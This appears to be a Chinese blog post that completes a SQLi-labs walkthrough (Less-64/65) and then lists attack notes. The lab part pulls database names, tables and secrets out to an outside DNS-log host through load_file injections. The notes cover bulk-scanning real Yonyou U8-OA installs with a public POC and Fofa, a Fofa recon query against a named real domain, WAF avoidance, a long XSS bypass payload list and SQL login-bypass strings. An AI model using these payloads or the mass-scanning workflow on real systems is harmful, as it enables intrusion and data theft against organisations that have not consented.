TZPD8yDonwQ22CubAiL57IAB

25.Less-64

a.注入點判斷

除了輸入正確的數(shù)字有顯示，如果再輸入其他符號或字母一概不顯示

b.輪子測試

1 and(1)

c.獲取數(shù)據(jù)庫名稱

1 and(select load_file(concat(‘\\’,(select database()),‘.4kmw9o.dnslog.cn\abc’)))

d.獲取表名

1 and(select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0,1),‘.4kmw9o.dnslog.cn\abc’)))

Uonkinbilw

e.獲取列名

1 and(select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0, 1) and table_schema=database() limit 2, 1),‘.4kmw9o.dnslog.cn\abc’)))

secret_ZGTB

f.獲取表內(nèi)數(shù)據(jù)

1 and(select load_file(concat(‘\\’,(select secret_ZGTB from Uonkinbilw where id=1),‘.4kmw9o.dnslog.cn\abc’)))

XYCNXPpkAXJX8UkwpGurdGZL

26.Less-65

終于到最后一關(guān)了，大結(jié)局，然后就可以去實戰(zhàn)了

a.注入點判斷

雙引號盲注

b.輪子測試

1" and if(1=1, sleep(1),0) and(1) and "

有延遲，if(1=1, sleep(1),0)只是用于判斷閉合，實際使用時去掉就行
1" and (1) and "

c.獲取數(shù)據(jù)庫名稱

1" and (select load_file(concat(‘\\’,(select database()),‘.4kmw9o.dnslog.cn\abc’))) and "

d.獲取表名

1" and (select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0,1),‘.4kmw9o.dnslog.cn\abc’))) and "

cbkyy6a08r

e.獲取列名

1" and (select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0, 1) and table_schema=database() limit 2, 1),‘.4kmw9o.dnslog.cn\abc’))) and "

secret_RHAB

f.獲取表內(nèi)數(shù)據(jù)

1" and (select load_file(concat(‘\\’,(select secret_RHAB from cbkyy6a08r where id=1),‘.4kmw9o.dnslog.cn\abc’))) and "

0r0KwIgn3d1KwEGu1FL3N596

三、筆記

挖掘注入點
谷歌語法：inurl:“?id=”
判斷ID是否為數(shù)字，可直接在參數(shù)值后面加/1 /0，若為數(shù)字加/0將報錯
若確認是數(shù)字，可繼續(xù)構(gòu)造poc，如1/if(1,1,0) 1/if(0,1,0)
若使用1/if(1=1,1,0) 或1/if(1 like 1,1,0) 出現(xiàn)永恒之白，可使用1/if(1.=1,1,0) 1/if(1.=2,1,0)等繼續(xù)進行測試
還可使用1/if(1.=ascii(2) ,1,0) 1/if(1.=hex(2) ,1,0) 1/if(1.=hex(schema()) ,1,0)
如果單引號被過濾，可使用 ‘xxx’ like ‘xx%’
如果截取函數(shù)substr及mid被過濾，可考慮left,right 1/if(68.hex(left(schema(),1)),1,0)(68用爆破得出)
獲得第一個字母之后可以繼續(xù)獲取后面的字母1/if(6864.like+hex(left(schema(),2)),1,0)
if若過濾可使用case when替代

sql注入判斷是否有注入的方法
除了使用單引號雙引號之外還可以使用，1/2 1/1 1/0判斷是否有注入
通過1 and 1=1 --+與 1 and 1=2 --+觀察是否有變化后使用盲注

首先選擇要挖什么漏洞
比如用友 U8 OA SQL注入漏洞
至于想找什么漏洞信息可去漏洞庫找找，如
https://wiki.bylibrary.cn/%E6%BC%8F%E6%B4%9E%E5%BA%93/01-CMS%E6%BC%8F%E6%B4%9E/ActiveMQ/ActiveMQ%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/
信息收集階段我們的主要目標是：
1、找到網(wǎng)上公開的漏洞POC
比如POC：
http://IP:PORT/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))
2、使用找出可能存在該漏洞的IP列表
比如可以用Fofa語句：title=“用友U8-OA”,
可以使用Github開源工具Fofa-collect批量導(dǎo)入列表驗證
POC批量驗證的腳本在PeiQi文庫的POC基礎(chǔ)上進一步改寫，支持批量導(dǎo)入IP.txt，并導(dǎo)出存在漏洞的URL，保存為urls.txt。
接著使用批量IP反查域名，這時候我們只需要去訪問域名，就可以知道這個IP對應(yīng)的公司。于是我們就可以拿著這些信息去提交漏洞了！
再次強調(diào)滲透測試點到為止，提交漏洞只需要跑出數(shù)據(jù)庫名證明漏洞存在，信息安全三要素CIA時刻銘記于心
在拿到新的POC時，僅需替換POC_1()函數(shù)，代碼稍加改動，就可以實現(xiàn)另一個漏洞的批量挖掘。

四、信息收集常用端口

http://duankou.wlphp.com/
文件共享服務(wù)端口
21,22,69,2049.139.389
遠程連接服務(wù)端口
23,3389.5900,5632
Web應(yīng)用服務(wù)端口
80.443.8080,8089,7001,7002,9090,4848,1352,10000
數(shù)據(jù)庫服務(wù)端口
3306,1433,1521,5432,27017,27018,6379,5000
郵件服務(wù)端口
25,110,143
網(wǎng)絡(luò)常見協(xié)議端口
53,67,68,161
特殊服務(wù)端口
2128,8068,9200,9300,11211,512,513,514,873,3690,50000

21,22,69,2049.139.389,23,3389.5900,5632,80.443.8080,8089,7001,7002,9090,4848,1352,10000,3306,1433,1521,5432,27017,27018,6379,5000,25,110,143,53,67,68,161,2128,8068,9200,9300,11211,512,513,514,873,3690,50000

五、常用測試xss

<script>console%2elog(299792458)%3c<%2fscript>
"><script>console.log(299792458)<%2fscript><"
'><script>console.log(299792458)<%2fscript>
'><script>console.log(299792458)<%2fscript><'
"""><SCRIPT>console.log("xss test")
'''><SCRIPT>console.log("xss test")'
<SCRIPT>console.log(299792458)%3b<%2fSCRIPT>
<<SCRIPT>console.log("xss test")//<</SCRIPT>
<<SCRIPT>console.log(299792458)%2f%2f<<%2fSCRIPT>
<<SCRIPT>console.log(299792458)%2f%2f<<%2fSCRIPT>

<img src%3d"1" onerror%3d"console.log(299792458)">
<img src%3d'1' onerror%3d'console.log(299792458)'
<IMG """><SCRIPT>console.log(299792458)<%2fSCRIPT>">
<IMG '''><SCRIPT>console.log(299792458)<%2fSCRIPT>'>

未成功
<scri<scr<script>ipt>pt>confirm(299792458)%3b<%2fscr<%2fsc<%2fscript>ript>ipt>
<scri<scr<script>ipt>pt>console.log(299792458)%3b<%2fscr<%2fsc<%2fscript>ript>ipt>
<SCRI<script>PT>console.log(299792458)%3b<%2fSCR<%2fscript>IPT>
<scri<script>pt>console.log(299792458)%3b<%2fscr<%2fscript>ipt>
console.log(299792458)%3b
%3bconsole.log(299792458)%3b
'%3bconsole.log(299792458)%3b'
"%3bconsole.log(299792458)%3b"
\"%3bconsole.log(299792458)%3b%2f%2f
<SCR%00IPT>console.log(299792458)<%2fSCR%00IPT>
<SCR%2500IPT>console.log("xss test")</SCR%2500IPT>
<STYLE TYPE%3d"text%2fjavascript">console.log(299792458)%3b<%2fSTYLE>
"onmouseover%3dconsole.log(299792458)%20
"onmouseout%3dconsole.log(299792458)%20
"onmousemove%3dconsole.log(299792458)%20
" οnmοuseοver="console.log(/xss test/)
' οnmοuseοver='console.log(/xss test/)
' οnclick='console.log("xss test")
onload%3d'console.log(299792458)'
onload%3d"console.log(299792458)"
onerror%3d'console.log(299792458)'
onerror%3d"console.log(299792458)"
<IFRAME SRC%3d'f' onerror%3d'console.log(299792458)'><%2fIFRAME>
<IFRAME SRC%3d'f' onerror%3d"console.log(299792458)"><%2fIFRAME>
<IFRAME SRC%3d'f' onerror%3d'console.log("xss test")'></IFRAME>
'''><SCRIPT>console.log(299792458)'
"""><SCRIPT>console.log(299792458)
oonnfocus=javascripscriptt:console.log('xss test')
" oonnfocus=javascriscriptpt:console.log('xss test')>
"><a href=javascript:console.log('xss test')>xss test</a>

六、SQL注入萬能密碼

1‘ or 1=1–+
1‘or’1’=‘1
“or"a”="a
')or(‘a(chǎn)’='a
")or(“a”="a
‘or 1=1–
“or 1=1–
'or”=’
'or 1=1%00
'or 1=1/
admin’ or 1=1/*

七、本次攻防演練中得到的幾點經(jīng)驗

1、首先用wafw00f-master看網(wǎng)站有沒有開WAF，有WAF的情況下就不要去做目錄掃描了，本人試過，百分百會被封IP
2、如果開啟了WAF的情況下可以使用fofa用以下方法掃敏感信息
domain=“yimazhineng.cn” && (host=“.admin.php” || title=“后臺” || body=“管理” || body=“用戶名” || body=“密碼” || body=“身份證號” || body=“手機號” || body=“注冊” || body=“登錄”|| body=“改密碼”)
3、使用https://whatcms.org/檢測網(wǎng)站是不是用了CMS，以及CMS版本號，據(jù)此可以到網(wǎng)上找對應(yīng)版本的歷史漏洞找教程進行滲透文章來源地址http://www.zghlxwxcb.cn/news/detail-638873.html

到了這里，關(guān)于SQL注入實操三(SQLilabs Less41-65)的文章就介紹完了。如果您還想了解更多內(nèi)容，請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！